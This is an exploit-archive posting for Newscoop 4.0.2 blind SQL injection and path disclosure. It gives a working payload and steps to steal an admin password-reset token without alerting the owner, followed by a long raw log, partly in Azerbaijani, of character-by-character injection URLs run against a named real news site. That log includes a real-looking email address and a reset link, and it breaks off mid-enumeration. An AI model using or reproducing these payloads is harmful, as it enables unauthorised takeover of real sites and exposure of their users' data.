exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Newscoop 4.0.2 Path Disclosure / SQL Injection

Newscoop 4.0.2 Path Disclosure / SQL Injection
Posted Dec 3, 2012
Authored by Akastep, KASIB_OGLAN

Newscoop version 4.0.2 suffers from path disclosure and remote blind SQL injection vulnerabilities. Note that this finding houses site-specific data.

tags | exploit, remote, vulnerability, sql injection, info disclosure
SHA-256 | 1f994a8d225a2775ca5787a4cb6f4092b00101fb1d4cb00c69aa00ca9b4e44e2

Newscoop 4.0.2 Path Disclosure / SQL Injection

Change Mirror Download
================================================================================
Vulnerable Software: Newscoop 4.0.2
Official site: sourcefabric.org
Vulnerabilities: Blind SQLi & Path Disclosure
Condition to exploit this vulnerability: GPC must be set OFF.
Discovered by: AkaStep && KASIB_OGLAN
================================================================================

About vulns:




Demo: http://newscoop-demo.sourcefabric.org/admin/password_recovery.php


Payload:
' or sleep(10)-- and 9='9@you.owned

====================SHORT WAY TO GAIN ACCESS===================================

I discovered 2 SQL injection vulnerabilities in this script.
Using the example(below) i fetched SHA1 password of admin.
Then after 4-5 hours bruteforce/dictionary attack against that hash i found that i can't crack it A.S.A.P.

Then i found another BLIND SQLi in /admin/password_recovery.php (vulnerable parameter: f_email)

After searching table_name/structure on google i found that it is CMS Called Newscoop)
What is funny i found a bit "short way" how to exploit this vuln and gain access to this cms without password crack)

Steps:
1 ) Using BLIND SQLi obtain admin username
2 ) Using Blind SQLi obtain admin email address (yes! we need it too)
3 ) Then trigger password reset condition(we need generate new token but in *unusual* way.(see 3A))
3A) What is funny since our password reset "triggering" input is malformed
in ex:

karen.sargsyan@gmail.com'-- and 9!='9karen.sargsyan@gmail.com <=Only once!!


CMS's @mailout() function will fail to deliver information about token/password request to admin email))( We are still hidden :)

4 ) Using BLIND SQli obtain token from database( You need to obtain 50 symbols )
In ex:

Payload:

f_post_sent=1&f_email=karen.sargsyan@gmail.com' and (select if(substr(password_reset_token,15,1)='1',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password



And notice i'm using here sleep().(Time Based way)
This is Neccessary. On server side this'll "sleep" mysql query execution.(Or query execution automatically will be killed)
This prevents another *new* token generation for us.

Finally after obtaining all this information (after verifying too) you have to create your password reset link)

Something like this:

http://tv.am/admin/password_check_token.php?token=f36baafc13c4be1690bd8e4deeb4314865debbcf1354545783&f_email=karen.sargsyan@gmail.com


You will be prompted to set new password for admin))

Set your password for admin and Enjoy))))))

Below is real exploitation example.



I'm not responsible for any damage if the target site !='.am'



=========================================================================================







http://tv.am/hy/armeniannews/schedule%27%20or%20sleep%2810%29--%20and%209=%279/

LoooL



http://tv.am/hy/armeniannews/schedule%27%20union%20select%201,2,3,4,5,6,7,8,9%20limit%201%20OFFSET%201--%20and%209=%279



http://tv.am/hy/armeniannews/schedules%27%20union%20select%20version%28%29,version%28%29,version%28%29,version%28%29,version%28%29,version%28%29,version%28%29,version%28%29,version%28%29%20limit%201%20OFFSET%200--%20and%209=%279
(When using union way you will get HTTP STATUS CODE =not found=)
So, union is not best choise and in this case it didn't worked for me anymore)

Full Blind.


tv.am/hy/armeniannews/schedule' and (select if(5=5,1,0))-- and 9='9


Metod:


False halinda qaytaracaq:

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%285=0,1,0%29%29--%20and%209=%279

Sorry, the requested page was not found.


TRUE halinda: normal sehife.

ne deyirem... Sikek!!!

>

Simvolu eynile <

Cox ehtimalki htmlspecialchars() dan kecir.Filtrdeyik.


Ok!!!

2 table_name var ki bunlarin her birinde password adli column var
===============================================
//TRUE
2-de.

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28count%28table_name%29=%272%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%29--%20and%209=%279


Sozu geden table-lardan 1-cisinin adi 14 ssimvoldur.

//TrUE
offset 0 -da
http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28length%28table_name%29=%2714%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%200%29--%20and%209=%279
===============================================


O biri table -in adi ise 12 simvol uzunluqdadir.

//TRUE
offset 1

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28length%28table_name%29=%2712%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%201%29--%20and%209=%279

12 simvol
===============================================
AMSconte</a>&nbsp;v 1.1 the content management system developed by AM Systems for <strong>h2</strong> Armenian Second TV Channel.






1-ci table-in adini yigaq:

===============================================
1-ci simvol: l

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,1,1%29=%27l%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%200%29--%20and%209=%279

===============================================

2-ci simvol: i

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,2,1%29=%27i%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%200%29--%20and%209=%279

===============================================

3-cu simvol: v

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,3,1%29=%27v%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%200%29--%20and%209=%279

===============================================

4-cu simvol: e

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,4,1%29=%27e%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%200%29--%20and%209=%279

===============================================

5-ci simvol: u


http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,5,1%29=%27u%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%200%29--%20and%209=%279

===============================================


6-ci simvol: s

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,6,1%29=%27s%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%200%29--%20and%209=%279
===============================================
hal hazirda: liveus*


7-ci simvol: e

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,7,1%29=%27e%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%200%29--%20and%209=%279

===============================================

8-ci simvol: r

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,8,1%29=%27r%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%200%29--%20and%209=%279

===============================================

9-cu simvol: _ (prefix)

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,9,1%29=%27_%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%200%29--%20and%209=%279

===============================================

hal hazirda table_name= liveuser_
===============================================

10-cu simvol: u

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,10,1%29=%27u%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%200%29--%20and%209=%279

===============================================

11-ci simvol: s

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,11,1%29=%27s%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%200%29--%20and%209=%279

===============================================

12-ci simvol: e

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,12,1%29=%27e%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%200%29--%20and%209=%279

===============================================

13-cu simvol: r

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,13,1%29=%27r%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%200%29--%20and%209=%279

===============================================

14-cu simvol: s
http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,14,1%29=%27s%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%200%29--%20and%209=%279

===============================================

1-ci table_name = liveuser_users


mysql> select length('liveuser_users') \g
+--------------------------+
| length('liveuser_users') |
+--------------------------+
| 14 |
+--------------------------+
1 row in set (0.02 sec)


Ok.









===============2 CI TABLE_NAME UCUN==============


mysql> select substr('liveuser_',1,9) \g
+-------------------------+
| substr('liveuser_',1,9) |
+-------------------------+
| liveuser_ |
+-------------------------+
1 row in set (0.00 sec)



False-dir ve table_prefix bawqadir.




=====2 CI TABLE_NAME UCUN=(cemi length(table)=12 =offset 1==

1-ci simvol: p

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,1,1%29=%27p%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%201%29--%20and%209=%279

===============================================
2-ci simvol: h


http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,2,1%29=%27h%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%201%29--%20and%209=%279
===============================================

3-cu simvol: o

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,3,1%29=%27o%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%201%29--%20and%209=%279

===============================================
4-cu simvol: r

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,4,1%29=%27r%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%201%29--%20and%209=%279


===============================================

5-ci simvol: u

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,5,1%29=%27u%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%201%29--%20and%209=%279


===============================================

6-ci simvol: m

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,6,1%29=%27m%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%201%29--%20and%209=%279
===============================================

7-c simvol: _ (prefix yene de)

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,7,1%29=%27_%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%201%29--%20and%209=%279

===============================================

8-ci simvol: u

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,8,1%29=%27u%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%201%29--%20and%209=%279
===============================================

9-cu simvol: s

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,9,1%29=%27s%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%201%29--%20and%209=%279
===============================================

10-cu simvol: e

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,10,1%29=%27e%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%201%29--%20and%209=%279
===============================================

11-ci simvol: r

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,11,1%29=%27r%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%201%29--%20and%209=%279

===============================================

12-ci simvol: s

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,12,1%29=%27s%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%201%29--%20and%209=%279

===============================================




===============================================




===============================================

1-ci table_name true!

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28table_name=%27liveuser_users%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27password%27%20limit%201%20offset%200%29--%20and%209=%279


Bu sikilmisde cox user var.



===============================================







2-ci table_name phorum_users




//TRUE
Basqa database yoxdur bizde.

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28count%28table_schema%29=%270%27,1,0%29%20from%20information_schema.tables%20where%20table_schema!=database%28%29%20and%20table_schema!=0x696E666F726D6174696F6E5F736368656D61%29--%20and%209=%279
0


Tapmaq lazimdir adminkaya cavabdeh table-i.




Demeli veziyyet beledir.

username

ve user_name adli columnlar var hardasa.Qalib say sec elemek.



//TRUE
http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28count%28table_name%29=%271%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%29--%20and%209=%279





Yeah))

//TRUE
http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28count%28table_name%29=%271%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279

Demeli basqa table varimizdir cox ehtimalki ele adminkaya cavabdeh budur!.


Yoxlayaq sonra cekek gorek basimiza ne gelir.


19 simvolludur bu table_name!!!!
//TRUE
http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28length%28table_name%29=%2719%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279


Cekek tez.



=========SUBHELI TABLE-IN=================

1-ci simvol: p

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,1,1%29=%27p%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279


==========================================
2-ci simvol: l


http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,2,1%29=%27l%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279


==========================================

3-cu simvol: u

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,3,1%29=%27u%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279

==========================================
4-cu simvol: g

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,4,1%29=%27g%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279

==========================================

5-ci simvol: i

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,5,1%29=%27i%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279
==========================================

6-ci simvol: n

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,6,1%29=%27n%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279


==========================================

7-ci simvol: _ (prefix)

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,7,1%29=%27_%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279

==========================================

8-ci simvol: b

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,8,1%29=%27b%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279

==========================================

9-cu simvol: l

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,9,1%29=%27l%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279

==========================================

10-cu simvol: o
http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,10,1%29=%27o%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279


==========================================
11-ci simvol: g

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,11,1%29=%27g%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279

==========================================

12-ci simvol: _

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,12,1%29=%27_%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279


==========================================

13-cu simvol: c

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,13,1%29=%27c%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279

==========================================
14-cu simvol: o

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,14,1%29=%27o%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279


==========================================
15-ci simvol: m

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,15,1%29=%27m%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279

=========================================
16-ci simvol: m

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,16,1%29=%27m%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279
=========================================

17-ci simvol: e

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,17,1%29=%27e%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279

=========================================

18-ci simvol: n

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,18,1%29=%27n%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279

==========================================
19-cu simvol: t

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,19,1%29=%27t%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27user_name%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279

==========================================

plugin_blog_comment

Icini sikim hec bu da admin table-a oxsamir.



Bele cetin olacaq 2-ci variant adminkaya girisde email vasitesile parolun berpasi var.
email columu axtaraq.


http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28count%28table_name%29=%272%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279

TRUE 2 verir.
2 table var burda.
1-ci yeqinki sikilmis subscribe ucundur.
2-ci si ise evvel axir admin table olmalidire oyani buyani yoxdur.


//TRUE
http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28count%28table_name%29=%272%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%29--%20and%209=%279




Burda da true-dir .


http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28count%28table_name%29=%272%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%29--%20and%209=%279







Yene de 2 verir.
Demeli bu tapmadigimiz hansisa table(-lardir).

http://tv.am/hy/armeniannews/schedule' and (select if(count(table_name)='2',1,0) from information_schema.columns where table_schema=database() and column_name='email' and table_name!='liveuser_users' and table_name!='phorum_users' and table_name!='plugin_blog_comment')-- and 9='9






========================================

Hemin bu table name 7 simvolludur.

Cekek naxuy blin.

//TRUE
offset 0
http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28length%28table_name%29=%277%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%20limit%201%20offset%200%29--%20and%209=%279

========================================
1-ci simvol: a

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,1,1%29=%27a%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%20limit%201%20offset%200%29--%20and%209=%279


========================================
2-ci simvol: u

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,2,1%29=%27u%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%20limit%201%20offset%200%29--%20and%209=%279

========================================
3-cu simvol: t

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,3,1%29=%27t%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%20limit%201%20offset%200%29--%20and%209=%279
========================================

4-cu simvol: h

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,4,1%29=%27h%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%20limit%201%20offset%200%29--%20and%209=%279

auhtors?

============================================

5-ci simvol: o

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,5,1%29=%27o%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%20limit%201%20offset%200%29--%20and%209=%279
============================================

6-ci simvol: r
http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,6,1%29=%27r%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%20limit%201%20offset%200%29--%20and%209=%279

============================================

7-ci simvol: s

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,7,1%29=%27s%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%20limit%201%20offset%200%29--%20and%209=%279
============================================

Oz aramizdi bu table ola biler.Mentiqnen xeber saytinda xeberi yerlesdiren kimdir? Muellif yani admin.?

Her ehtimal ucun o biri table-name-i cekek sonrabirlikde yoxlanislar edek.


Oba!!!

http://code.sourcefabric.org/rdiff/newscoop?csid=c99c712f9d62cf39709ffc4ff0d49ac545900ba3&u&N

https://www.google.az/search?q=b2d716fb2328a246e8285f47b1500ebcb349c187&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a


Demeli liveuser_users dedir admin.



http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28count%28%60password%60%29!=%270%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279


http://tv.am/hy/armeniannews/schedule' and (select if(count(`password`)!='0',1,0) from liveuser_users where id=1)-- and 9='9


Pis xeberler burda parol sha1 sifrelenme iledir.


//TRUE
http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28length%28%60password%60%29=%2740%27,1,0%29%20from%20liveuser_users%20where%20id=1%29--%20and%209=%279


Cekek getsin naxuy.







2-ci table ise 15 simvolludur.
Cekek getsin bu sikilmisi de.

//TRUE
http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28length%28table_name%29=%2715%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%20limit%201%20offset%201%29--%20and%209=%279




===================CEKIRIK HAAAAAAAAAAAA)))))))))==================

1-ci simvol: p
http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,1,1%29=%27p%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%20limit%201%20offset%201%29--%20and%209=%279

=================================================================
2-ci simvol: h

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,2,1%29=%27h%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%20limit%201%20offset%201%29--%20and%209=%279

yene phorum? Blin...

=================================================================
orum_
==================================================================
8-ci simvol: m

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,8,1%29=%27m%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%20limit%201%20offset%201%29--%20and%209=%279
==================================================================
9-cu simvol: e

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,9,1%29=%27e%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%20limit%201%20offset%201%29--%20and%209=%279

==================================================================
10-cu simvol: s

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,10,1%29=%27s%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%20limit%201%20offset%201%29--%20and%209=%279
==================================================================
11: s

http://tv.am/hy/armeniannews/schedule%27%20and%20%28select%20if%28substr%28table_name,11,1%29=%27s%27,1,0%29%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20column_name=%27email%27%20and%20table_name!=%27liveuser_users%27%20and%20table_name!=%27phorum_users%27%20and%20table_name!=%27plugin_blog_comment%27%20limit%201%20offset%201%29--%20and%209=%279


==================================================================
12: a

